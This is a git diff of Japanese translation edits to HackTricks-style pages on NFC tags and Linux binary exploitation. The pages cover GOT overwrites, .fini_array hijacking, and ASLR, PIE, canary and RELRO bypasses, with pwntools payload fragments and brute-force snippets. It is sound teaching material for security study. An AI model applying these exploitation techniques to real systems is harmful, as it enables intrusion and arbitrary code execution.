-**高周波13.56 MHzタグは一連の標準とプロトコルです**。通常、[NFC](https://nfc-forum.org/what-is-nfc/about-the-technology/)と呼ばれますが、必ずしも正しいわけではありません。物理的および論理的レベルで使用される基本的なプロトコルセットはISO 14443です。高レベルのプロトコルや代替標準（ISO 19092など）はこれに基づいています。この技術は**近接通信（NFC）**と呼ばれることが多く、13.56 MHz周波数で動作するデバイスの用語です。
+**高周波13.56 MHzタグは一連の標準とプロトコルです**。通常、[NFC](https://nfc-forum.org/what-is-nfc/about-the-technology/)と呼ばれますが、必ずしも正しいわけではありません。物理的および論理的レベルで使用される基本的なプロトコルセットはISO 14443です。高レベルのプロトコルや代替標準（ISO 19092など）はこれに基づいています。この技術は**近距離通信（NFC）**と呼ばれることが多く、13.56 MHz周波数で動作するデバイスの用語です。
 
 <figure><img src="../images/image (22).png" alt=""><figcaption></figcaption></figure>
 
 簡単に言えば、NFCのアーキテクチャは次のように機能します：送信プロトコルはカードを製造する会社によって選択され、低レベルのISO 14443に基づいて実装されます。例えば、NXPはMifareと呼ばれる独自の高レベル送信プロトコルを発明しました。しかし、低レベルでは、MifareカードはISO 14443-A標準に基づいています。
 
-Flipperは、低レベルのISO 14443プロトコルとMifare Ultralightデータ転送プロトコル、銀行カードで使用されるEMVと相互作用できます。Mifare ClassicとNFC NDEFのサポートを追加する作業を進めています。NFCを構成するプロトコルと標準についての詳細な考察は、別の記事にする価値があります。
+Flipperは、低レベルのISO 14443プロトコルとMifare Ultralightデータ転送プロトコル、銀行カードで使用されるEMVと相互作用できます。Mifare ClassicとNFC NDEFのサポートを追加する作業を進めています。NFCを構成するプロトコルと標準についての詳細な考察は、別の記事に値するもので、後で公開する予定です。
 
 ISO 14443-A標準に基づくすべての高周波カードにはユニークなチップIDがあります。これはカードのシリアル番号として機能し、ネットワークカードのMACアドレスのようなものです。**通常、UIDは4または7バイトの長さですが、まれに**10バイトまで**行くことがあります。UIDは秘密ではなく、簡単に読み取ることができ、**時にはカード自体に印刷されていることもあります**。
 
 UIDに依存して**認証とアクセスを許可する**多くのアクセス制御システムがあります。時には、RFIDタグが**暗号化をサポートしている**場合でも、これが発生します。このような**誤用**は、セキュリティの観点から、愚かな**125 kHzカード**のレベルにまで引き下げます。仮想カード（Apple Payなど）は、電話の所有者が支払いアプリでドアを開けることがないように、動的UIDを使用します。
 
-- **低い範囲** — 高周波カードは、リーダーの近くに置かなければならないように特別に設計されています。これにより、カードが無許可の相互作用から保護されます。私たちが達成した最大の読み取り範囲は約15 cmで、これはカスタムメイドの高範囲リーダーを使用した場合です。
+- **低い範囲** — 高周波カードは、リーダーの近くに置かなければならないように特別に設計されています。これにより、カードが不正な相互作用から保護されます。私たちが達成した最大の読み取り範囲は約15 cmで、これはカスタムメイドの高範囲リーダーを使用した場合です。
 - **高度なプロトコル** — データ転送速度が424 kbpsまで可能で、完全な双方向データ転送を伴う複雑なプロトコルを可能にします。これにより、**暗号化**、データ転送などが可能になります。
 - **高いセキュリティ** — 高周波の非接触カードは、スマートカードに劣ることはありません。AESのような暗号的に強いアルゴリズムをサポートし、非対称暗号化を実装するカードもあります。
 
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-got-plt.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-got-plt.md
index 9ce69c5a4..2d9e11ce0 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-got-plt.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-got-plt.md
@@ -6,7 +6,7 @@
 
 ### **GOT: グローバルオフセットテーブル**
 
-**グローバルオフセットテーブル (GOT)** は、動的リンクバイナリで**外部関数のアドレス**を管理するために使用されるメカニズムです。これらの**アドレスは実行時まで知られない**ため（動的リンクのため）、GOTは**これらの外部シンボルのアドレスを動的に更新する方法**を提供します。
+**グローバルオフセットテーブル (GOT)** は、動的リンクバイナリで**外部関数のアドレス**を管理するために使用されるメカニズムです。これらの**アドレスは実行時まで不明であるため**（動的リンクのため）、GOTは**これらの外部シンボルのアドレスを動的に更新する方法**を提供します。
 
 GOTの各エントリは、バイナリが呼び出す可能性のある外部ライブラリのシンボルに対応しています。**関数が最初に呼び出されると、その実際のアドレスは動的リンカーによって解決され、GOTに保存されます**。同じ関数への後続の呼び出しは、GOTに保存されたアドレスを使用し、再度アドレスを解決するオーバーヘッドを回避します。
 
@@ -20,7 +20,7 @@ GOTの各エントリは、バイナリが呼び出す可能性のある外部
 
 ### GOTを確認
 
-GOTテーブルへのアドレスを取得するには: **`objdump -s -j .got ./exec`**
+GOTテーブルのアドレスを取得するには: **`objdump -s -j .got ./exec`**
 
 ![](<../../../images/image (619).png>)
 
@@ -34,13 +34,13 @@ GEFを使用して**デバッグ**セッションを**開始**し、**`got`**を
 
 ### GOT2Exec
 
-バイナリ内のGOTは、**関数のアドレス**または**PLT**セクションのアドレスを持っています。この任意の書き込みの目的は、後で実行される関数の**GOTエントリを上書きすること**です。例えば、**`system`** **関数**のPLTの**アドレス**で上書きします。
+バイナリ内のGOTには、**関数のアドレス**または**PLT**セクションのアドレスが含まれています。この任意の書き込みの目的は、**後で実行される関数のGOTエントリを上書きすること**です。例えば、**`system`** **関数**のPLTの**アドレス**で上書きします。
 
-理想的には、**あなたが制御するパラメータで呼び出される関数のGOTを上書きする**ことになります（これにより、system関数に送信されるパラメータを制御できるようになります）。
+理想的には、**あなたが制御するパラメータで呼び出される関数のGOTを上書き**します（これにより、system関数に送信されるパラメータを制御できるようになります）。
 
 もし**`system`** **がスクリプトで使用されていない場合**、system関数はPLTにエントリを持ちません。このシナリオでは、最初に`system`関数のアドレスを**リーク**し、その後GOTをこのアドレスを指すように上書きする必要があります。
 
-PLTアドレスは**`objdump -j .plt -d ./vuln_binary`**で見ることができます。
+PLTアドレスは**`objdump -j .plt -d ./vuln_binary`**で確認できます。
 
 ## **One Gadget**
 
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aws2exec-.dtors-and-.fini_array.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aws2exec-.dtors-and-.fini_array.md
index fd5d5f7cc..c4b319d07 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aws2exec-.dtors-and-.fini_array.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aws2exec-.dtors-and-.fini_array.md
@@ -8,21 +8,21 @@
 > 現在、**.dtors セクションを持つバイナリを見つけるのは非常に奇妙です**。
 
 デストラクタは、**プログラムが終了する前に実行される関数**です（`main` 関数が戻った後）。\
-これらの関数のアドレスはバイナリの **`.dtors`** セクションに格納されているため、**`__DTOR_END__`** に **シェルコード** の **アドレス**を書き込むことができれば、それはプログラムが終了する前に**実行されます**。
+これらの関数のアドレスはバイナリの **`.dtors`** セクションに格納されているため、**`__DTOR_END__`** に **シェルコード** の **アドレス**を書き込むことができれば、それはプログラムが終了する前に **実行されます**。
 
 このセクションのアドレスを取得するには:
 ```bash
 objdump -s -j .dtors /exec
 rabin -s /exec | grep “__DTOR”
 ```
-通常、**DTOR** マーカーは、値 `ffffffff` と `00000000` の **間** に見つかります。したがって、これらの値だけが見える場合、**登録された関数は存在しない** ことを意味します。したがって、**`00000000`** を **シェルコード** の **アドレス** で **上書き** します。
+通常、**DTOR** マーカーは `ffffffff` と `00000000` の値の **間** に見つかります。したがって、これらの値だけが見える場合は、**登録された関数がない** ことを意味します。したがって、**`00000000`** を **シェルコード** の **アドレス** で **上書き** します。
 
 > [!WARNING]
-> もちろん、最初に **シェルコードを格納する場所** を見つける必要があります。その後、呼び出すことができます。
+> もちろん、最初に **シェルコードを保存する場所** を見つける必要があります。その後、呼び出すことができます。
 
 ## **.fini_array**
 
-本質的に、これはプログラムが終了する前に **呼び出される関数** の構造体です。これは **`.dtors`** のように、**アドレスにジャンプしてシェルコードを呼び出す** ことができる場合や、**再度 `main` に戻って** **脆弱性を二度目に悪用する** 必要がある場合に興味深いです。
+本質的に、これはプログラムが終了する前に **呼び出される関数** の構造体です。これは **`.dtors`** のように興味深いです。これは、**アドレスにジャンプしてシェルコードを呼び出す** ことができる場合や、**再度脆弱性を悪用するために `main` に戻る** 必要がある場合に役立ちます。
 ```bash
 objdump -s -j .fini_array ./greeting
 
@@ -33,7 +33,7 @@ Contents of section .fini_array:
 
 #Put your address in 0x8049934
 ```
-注意してください、これは**永遠のループ**を**作成しません**。なぜなら、メインに戻るとカナリアが気づき、スタックの終わりが破損している可能性があり、関数は再度呼び出されないからです。これにより、脆弱性の**1回の実行**を**持つことができます**。
+注意してください、これは**永遠のループ**を**作成しません**。なぜなら、メインに戻るとカナリアが気づき、スタックの終わりが破損している可能性があり、関数は再度呼び出されないからです。これにより、**もう1回の実行**が可能になります。
 
 > [!CAUTION]
 > [Full RELRO](../common-binary-protections-and-bypasses/relro.md)を使用すると、セクション`.fini_array`は**読み取り専用**になります。
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/README.md
index 75349d57a..7df374019 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/README.md
@@ -1,10 +1,10 @@
-# 共通のバイナリ保護
+# 共通バイナリ保護
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## コアファイルの有効化
 
-**コアファイル**は、プロセスがクラッシュしたときにオペレーティングシステムによって生成されるファイルの一種です。これらのファイルは、プロセスの終了時のメモリイメージをキャプチャし、プロセスのメモリ、レジスタ、およびプログラムカウンタの状態など、他の詳細を含みます。このスナップショットは、デバッグやクラッシュの原因を理解するために非常に価値があります。
+**コアファイル**は、プロセスがクラッシュしたときにオペレーティングシステムによって生成されるファイルの一種です。これらのファイルは、プロセスの終了時のメモリイメージをキャプチャし、プロセスのメモリ、レジスタ、およびプログラムカウンタの状態など、その他の詳細を含みます。このスナップショットは、デバッグやクラッシュの原因を理解するために非常に価値があります。
 
 ### **コアダンプ生成の有効化**
 
@@ -14,13 +14,13 @@
 ```bash
 ulimit -c unlimited
 ```
-- **永続的な設定**: より永続的な解決策として、`/etc/security/limits.conf` ファイルを編集して `* soft core unlimited` のような行を追加することができます。これにより、すべてのユーザーがセッションで手動で ulimit を設定することなく、無制限のサイズのコアファイルを生成できるようになります。
+- **永続的な設定**: より永続的な解決策として、`/etc/security/limits.conf` ファイルを編集して `* soft core unlimited` のような行を追加することができます。これにより、すべてのユーザーがセッション内で手動で ulimit を設定することなく、無制限のサイズのコアファイルを生成できるようになります。
 ```markdown
 - soft core unlimited
 ```
 ### **GDBを使用したコアファイルの分析**
 
-コアファイルを分析するには、GDB（GNUデバッガ）などのデバッグツールを使用できます。コアダンプを生成した実行可能ファイルがあり、コアファイルの名前が`core_file`であると仮定すると、分析を開始するには次のようにします:
+コアファイルを分析するには、GDB（GNUデバッガ）などのデバッグツールを使用できます。コアダンプを生成した実行可能ファイルがあり、コアファイルの名前が`core_file`であると仮定すると、分析を開始するには次のようにします：
 ```bash
 gdb /path/to/executable /path/to/core_file
 ```
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/README.md
index c2501e9e5..cdb58e292 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/README.md
@@ -43,7 +43,7 @@ kernel.randomize_va_space=2 # Enable ASLR
 # or
 kernel.randomize_va_space=0 # Disable ASLR
 ```
-`/etc/sysctl.conf`を編集した後、次のコマンドで変更を適用します:
+`/etc/sysctl.conf`を編集した後、変更を適用するには次のコマンドを実行します:
 ```bash
 sudo sysctl -p
 ```
@@ -69,7 +69,7 @@ PaXはプロセスアドレス空間を**3つのグループ**に分けます：
 ```python
 for off in range(0xb7000000, 0xb8000000, 0x1000):
 ```
-- リモートサーバーを攻撃する場合、**`libc`関数`usleep`のアドレスをブルートフォースする**ことを試みることができます。引数として10を渡します（例えば）。もしある時点で**サーバーが応答するのに10秒余分にかかる**場合、この関数のアドレスを見つけたことになります。
+- リモートサーバーを攻撃する場合、**`libc`関数`usleep`のアドレスをブルートフォースする**ことを試みることができます。引数として10を渡します（例えば）。もしある時点で**サーバーが応答するのに10秒余分にかかる**場合、その関数のアドレスを見つけたことになります。
 
 > [!TIP]
 > 64ビットシステムではエントロピーがはるかに高く、これは不可能です。
@@ -85,7 +85,7 @@ for off in range(0xb7000000, 0xb8000000, 0x1000):
 - **arg_start** & **arg_end**: **CLI引数**の上と下のアドレス
 - **env_start** & **env_end**: **環境変数**の上と下のアドレス
 
-したがって、攻撃者がエクスプロイトされているバイナリと同じコンピュータにいる場合、このバイナリが生の引数からのオーバーフローを期待していないが、このファイルを読み取った後に作成できる別の**入力からのオーバーフローを期待している場合**、攻撃者はこのファイルから**いくつかのアドレスを取得し、それらからオフセットを構築してエクスプロイトを行う**ことが可能です。
+したがって、攻撃者がエクスプロイトされているバイナリと同じコンピュータにいる場合、このバイナリが生の引数からのオーバーフローを期待していないが、このファイルを読み取った後に作成できる別の**入力からのオーバーフローを期待している場合**、攻撃者は**このファイルからいくつかのアドレスを取得し、それらからオフセットを構築してエクスプロイトを行う**ことが可能です。
 
 > [!TIP]
 > このファイルに関する詳細は、[https://man7.org/linux/man-pages/man5/proc.5.html](https://man7.org/linux/man-pages/man5/proc.5.html)で`/proc/pid/stat`を検索して確認してください。
@@ -148,7 +148,7 @@ payload += p32(elf.symbols['main'])
 
 ### Ret2ret & Ret2pop
 
-スタック内のアドレスを悪用してASLRをバイパスしてみてください：
+スタック内のアドレスを悪用してASLRをバイパスしようとします：
 
 {{#ref}}
 ../../stack-overflow/ret2ret.md
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/ret2plt.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/ret2plt.md
index d520e8d71..7f3ee0e88 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/ret2plt.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/ret2plt.md
@@ -4,9 +4,9 @@
 
 ## 基本情報
 
-この技術の目的は、**PLTから関数のアドレスを漏洩させる**ことでASLRをバイパスできるようにすることです。例えば、libcから関数`puts`のアドレスを漏洩させると、**`libc`のベースがどこにあるかを計算**し、**`system`**などの他の関数にアクセスするためのオフセットを計算できます。
+この技術の目的は、**PLTから関数のアドレスを漏洩させること**でASLRをバイパスできるようにすることです。例えば、libcから関数`puts`のアドレスを漏洩させると、**`libc`のベースがどこにあるかを計算**し、**`system`**などの他の関数にアクセスするためのオフセットを計算できます。
 
-これは、`pwntools`ペイロードを使用して行うことができます（[**こちらから**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/plt_and_got)）：
+これは、`pwntools`ペイロードを使用して行うことができます（[**ここから**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/plt_and_got)）：
 ```python
 # 32-bit ret2plt
 payload = flat(
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/README.md
index cc2749dbb..5224e448c 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/README.md
@@ -6,24 +6,24 @@
 
 PIE（**位置独立実行可能ファイル**）としてコンパイルされたバイナリは、**プログラムが実行されるたびに異なるメモリ位置にロードされる**ことを意味し、ハードコーディングされたアドレスを防ぎます。
 
-これらのバイナリを悪用するトリックは、**相対アドレス**を利用することにあります。プログラムの部分間のオフセットは、絶対位置が変わっても同じままです。**PIEをバイパスするには、1つのアドレスを漏洩させるだけで済みます**。通常は、**スタック**からフォーマット文字列攻撃のような脆弱性を利用して取得します。アドレスを取得したら、**固定オフセット**を使って他のアドレスを計算できます。
+これらのバイナリを悪用するトリックは、**相対アドレス**を利用することにあります。プログラムの部分間のオフセットは、絶対位置が変わっても同じままです。**PIEをバイパスするには、1つのアドレスを漏洩させるだけで済みます**。通常は、**スタック**からフォーマット文字列攻撃のような脆弱性を利用して取得します。アドレスを取得すると、**固定オフセット**を使って他のアドレスを計算できます。
 
 PIEバイナリを悪用する際の役立つヒントは、**基本アドレスが通常000で終わる**ことです。これは、メモリページがランダム化の単位であり、サイズが0x1000バイトであるためです。このアライメントは、**エクスプロイトが期待通りに動作しない場合の重要なチェック**となり、正しい基本アドレスが特定されているかどうかを示します。\
-また、エクスプロイトにこれを利用することもできます。例えば、アドレスが**`0x649e1024`**にあることが漏洩した場合、**基本アドレスは`0x649e1000`**であることがわかり、そこから関数や位置の**オフセットを計算**できます。
+また、エクスプロイトにこれを使用することもできます。アドレスが**`0x649e1024`**にあることが漏洩した場合、**基本アドレスは`0x649e1000`**であることがわかり、そこから関数や位置の**オフセットを計算**できます。
 
 ## バイパス
 
 PIEをバイパスするには、**ロードされたバイナリのアドレスを漏洩させる**必要があります。これにはいくつかのオプションがあります：
 
-- **ASLRを無効にする**: ASLRが無効になっている場合、PIEでコンパイルされたバイナリは常に**同じアドレスにロードされる**ため、**PIEは無意味になります**。オブジェクトのアドレスは常に同じ場所にあります。
+- **ASLRを無効にする**：ASLRが無効になっている場合、PIEでコンパイルされたバイナリは常に**同じアドレスにロードされます**。したがって、**PIEは無意味になります**。オブジェクトのアドレスは常に同じ場所にあります。
 - 漏洩を**与えられる**（簡単なCTFチャレンジで一般的、[**この例を確認**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-exploit)）
-- スタック内の**EBPおよびEIP値をブルートフォース**して正しいものを漏洩させる：
+- スタック内の**EBPおよびEIP値をブルートフォース**して、正しいものを漏洩させる：
 
 {{#ref}}
 bypassing-canary-and-pie.md
 {{#endref}}
 
-- [**フォーマット文字列**](../../format-strings/)のような任意の読み取り脆弱性を使用して、バイナリのアドレスを漏洩させ（前の技術のようにスタックから）、バイナリの基本を取得し、そこからオフセットを使用します。[**ここに例を見つけてください**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-bypass)。
+- [**フォーマット文字列**](../../format-strings/)のような任意の読み取り脆弱性を使用して、バイナリのアドレスを漏洩させ（例：前の技術のようにスタックから）、バイナリの基本を取得し、そこからオフセットを使用します。[**ここに例を見つけてください**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-bypass)。
 
 ## 参考文献
 
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md
index 969a4c3a6..9dfcb4e49 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md
@@ -2,7 +2,7 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-**バイナリがカナリアとPIE（位置独立実行可能ファイル）によって保護されている場合、それらをバイパスする方法を見つける必要があります。**
+**バイナリがカナリアとPIE（位置独立実行可能ファイル）によって保護されている場合、それをバイパスする方法を見つける必要があります。**
 
 ![](<../../../../images/image (144).png>)
 
@@ -12,13 +12,13 @@
 
 ## ブルートフォースアドレス
 
-PIEをバイパスするためには、**いくつかのアドレスをリークする**必要があります。そして、バイナリがアドレスをリークしていない場合、最善の方法は**脆弱な関数内のスタックに保存されたRBPとRIPをブルートフォースする**ことです。\
+PIEをバイパスするためには、**いくつかのアドレスをリークする**必要があります。そして、バイナリがアドレスをリークしていない場合、最善の方法は、脆弱な関数内のスタックに保存された**RBPとRIPをブルートフォースする**ことです。\
 例えば、バイナリが**カナリア**と**PIE**の両方で保護されている場合、カナリアをブルートフォースし始め、その後の8バイト（x64）が保存された**RBP**であり、次の8バイトが保存された**RIP**になります。
 
 > [!TIP]
-> スタック内の戻りアドレスはメインバイナリコードに属していると考えられています。脆弱性がバイナリコード内にある場合、通常はその通りです。
+> スタック内の戻りアドレスは、メインバイナリコードに属していると考えられています。脆弱性がバイナリコード内にある場合、通常はその通りです。
 
-バイナリからRBPとRIPをブルートフォースするには、プログラムが何かを出力するか、単にクラッシュしない場合、正しいと推測されたバイトが有効であることを確認できます。カナリアをブルートフォースするために提供された**同じ関数**を使用してRBPとRIPをブルートフォースできます：
+バイナリからRBPとRIPをブルートフォースするには、プログラムが何かを出力するか、単にクラッシュしない場合、正しいと推測されたバイトが有効であることを確認できます。カナリアをブルートフォースするために提供された**同じ関数**を使用して、RBPとRIPをブルートフォースできます。
 ```python
 from pwn import *
 
@@ -68,7 +68,7 @@ RIP = u64(base_canary_rbp_rip[len(base_canary_rbp_rip)-8:])
 ```
 PIEを打破するために必要な最後のことは、**漏洩した**アドレスから**有用なアドレス**を計算することです：**RBP**と**RIP**です。
 
-**RBP**から、**スタックにシェルを書き込む場所**を計算できます。これは、スタック内の文字列_"/bin/sh\x00"_を書き込む場所を知るのに非常に役立ちます。漏洩したRBPとシェルコードの間の距離を計算するには、**RBPを漏洩させた後にブレークポイントを置き**、**シェルコードがどこにあるかを確認**するだけです。次に、シェルコードとRBPの間の距離を計算できます：
+**RBP**から、**スタックにシェルを書き込む場所**を計算できます。これは、スタック内の文字列_"/bin/sh\x00"_を書き込む場所を知るのに非常に役立ちます。漏洩したRBPとシェルコードの間の距離を計算するには、**RBPを漏洩させた後にブレークポイントを設定**し、**シェルコードがどこにあるかを確認**するだけです。次に、シェルコードとRBPの間の距離を計算できます：
 ```python
 INI_SHELLCODE = RBP - 1152
 ```
@@ -77,7 +77,7 @@ INI_SHELLCODE = RBP - 1152
 
 ![](<../../../../images/image (145).png>)
 
-この例では、すべてのコードを特定するために**1バイトと半分だけが必要**であることがわかります。この場合、ベースアドレスは**漏洩したRIPの最後が"000"**になります。たとえば、`0x562002970ecf`が漏洩した場合、ベースアドレスは`0x562002970000`です。
+この例では、すべてのコードを特定するために**1バイトと半分だけが必要**であることがわかります。この場合、ベースアドレスは**漏洩したRIPの"000"で終わる**ものになります。たとえば、`0x562002970ecf`が漏洩した場合、ベースアドレスは`0x562002970000`です。
 ```python
 elf.address = RIP - (RIP & 0xfff)
 ```
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/relro.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/relro.md
index bb9ee984d..e02d460e9 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/relro.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/relro.md
@@ -8,15 +8,15 @@
 
 ### **Partial RELRO**
 
-**Partial RELRO**は、バイナリのパフォーマンスに大きな影響を与えずにセキュリティを強化するためのよりシンプルなアプローチを取ります。**GOTをプログラムの変数の上に配置することで、Partial RELROはバッファオーバーフローがGOTに到達して破損するのを防ぐことを目的としています**。&#x20;
+**Partial RELRO**は、バイナリのパフォーマンスに大きな影響を与えずにセキュリティを強化するためのよりシンプルなアプローチを取ります。**GOTをプログラムの変数の上に配置することにより、Partial RELROはバッファオーバーフローがGOTに到達して破損するのを防ぐことを目的としています**。&#x20;
 
-これは**GOTが任意の書き込み**の脆弱性から悪用されるのを防ぐものではありません。
+これは**任意の書き込み**の脆弱性からGOTが悪用されるのを防ぐものではありません。
 
 ### **Full RELRO**
 
-**Full RELRO**は、**GOTを完全に読み取り専用にすることで保護を強化します。** バイナリが開始されると、すべての関数アドレスが解決され、GOTにロードされ、その後、GOTは読み取り専用としてマークされ、実行時にそれに対する変更を効果的に防ぎます。
+**Full RELRO**は、**GOTを完全に読み取り専用にすることによって保護を強化します。** バイナリが起動すると、すべての関数アドレスが解決されてGOTにロードされ、その後、GOTは読み取り専用としてマークされ、実行時にそれに対する変更を効果的に防ぎます。
 
-しかし、Full RELROのトレードオフはパフォーマンスと起動時間にあります。GOTを読み取り専用としてマークする前に、すべての動的シンボルを起動時に解決する必要があるため、**Full RELROが有効なバイナリは読み込み時間が長くなる可能性があります**。この追加の起動オーバーヘッドが、Full RELROがすべてのバイナリでデフォルトで有効になっていない理由です。
+しかし、Full RELROのトレードオフはパフォーマンスと起動時間に関するものです。GOTを読み取り専用としてマークする前にすべての動的シンボルを起動時に解決する必要があるため、**Full RELROが有効なバイナリは読み込み時間が長くなる可能性があります**。この追加の起動オーバーヘッドが、Full RELROがすべてのバイナリでデフォルトで有効になっていない理由です。
 
 バイナリでFull RELROが有効かどうかを確認することができます:
 ```bash
@@ -24,8 +24,8 @@ readelf -l /proc/ID_PROC/exe | grep BIND_NOW
 ```
 ## バイパス
 
-Full RELROが有効な場合、バイパスする唯一の方法は、任意の実行を得るためにGOTテーブルに書き込む必要のない別の方法を見つけることです。
+フル RELRO が有効な場合、バイパスする唯一の方法は、任意の実行を得るために GOT テーブルに書き込む必要のない別の方法を見つけることです。
 
-LIBCのGOTは通常Partial RELROであるため、任意の書き込みで変更可能です。詳細は[Targetting libc GOT entries](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#1---targetting-libc-got-entries)を参照してください。
+LIBC の GOT は通常パーシャル RELRO であるため、任意の書き込みで変更できます。詳細は [Targetting libc GOT entries](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#1---targetting-libc-got-entries) を参照してください。
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/README.md
index 8f13102b4..92afb4504 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/README.md
@@ -6,17 +6,17 @@
 
 **StackGuard** は、**EIP (Extended Instruction Pointer)** の前に **canary** として知られる特別な値 `0x000aff0d`（ヌル、改行、EOF、キャリッジリターンを表す）を挿入して、バッファオーバーフローから保護します。しかし、`recv()`、`memcpy()`、`read()`、および `bcopy()` のような関数は依然として脆弱であり、**EBP (Base Pointer)** を保護しません。
 
-**StackShield** は、**Global Return Stack** を維持することによって StackGuard よりも洗練されたアプローチを取ります。これにより、すべての戻りアドレス (**EIPs**) が保存され、オーバーフローが発生しても害を及ぼさないようにします。保存された戻りアドレスと実際の戻りアドレスを比較することで、オーバーフローの発生を検出できます。さらに、StackShield は戻りアドレスを境界値と照合して、**EIP** が期待されるデータ空間の外を指しているかどうかを検出できます。しかし、この保護は Return-to-libc、ROP (Return-Oriented Programming)、または ret2ret のような技術によって回避可能であり、StackShield もローカル変数を保護しないことを示しています。
+**StackShield** は、**Global Return Stack** を維持することで StackGuard よりも洗練されたアプローチを取ります。これにより、すべての戻りアドレス (**EIPs**) が保存され、オーバーフローが発生しても被害を及ぼさないようにします。保存された戻りアドレスと実際の戻りアドレスを比較することで、オーバーフローの発生を検出できます。さらに、StackShield は戻りアドレスを境界値と照合して、**EIP** が期待されるデータ空間の外を指しているかどうかを検出できます。しかし、この保護は Return-to-libc、ROP (Return-Oriented Programming)、または ret2ret のような技術によって回避可能であり、StackShield もローカル変数を保護しないことを示しています。
 
 ## **Stack Smash Protector (ProPolice) `-fstack-protector`:**
 
-このメカニズムは、**EBP** の前に **canary** を配置し、ローカル変数を再配置してバッファをより高いメモリアドレスに配置し、他の変数を上書きできないようにします。また、ローカル変数の上にスタックで渡された引数を安全にコピーし、これらのコピーを引数として使用します。しかし、8 要素未満の配列やユーザーの構造内のバッファは保護されません。
+このメカニズムは、**EBP** の前に **canary** を配置し、ローカル変数を再配置してバッファをより高いメモリアドレスに配置し、他の変数を上書きできないようにします。また、ローカル変数の上にスタックで渡された引数を安全にコピーし、これらのコピーを引数として使用します。しかし、8 要素未満の配列やユーザーの構造体内のバッファは保護されません。
 
 **canary** は `/dev/urandom` から派生したランダムな数またはデフォルト値 `0xff0a0000` です。これは **TLS (Thread Local Storage)** に保存され、スレッド間で共有メモリ空間がスレッド固有のグローバルまたは静的変数を持つことを可能にします。これらの変数は最初に親プロセスからコピーされ、子プロセスは親や兄弟に影響を与えずにデータを変更できます。しかし、**`fork()` を使用して新しい canary を作成しない場合、すべてのプロセス（親と子）は同じ canary を共有し、脆弱になります**。**i386** アーキテクチャでは、canary は `gs:0x14` に保存され、**x86_64** では `fs:0x28` に保存されます。
 
 このローカル保護は、攻撃に脆弱なバッファを持つ関数を特定し、これらの関数の先頭にコードを注入して canary を配置し、末尾でその整合性を確認します。
 
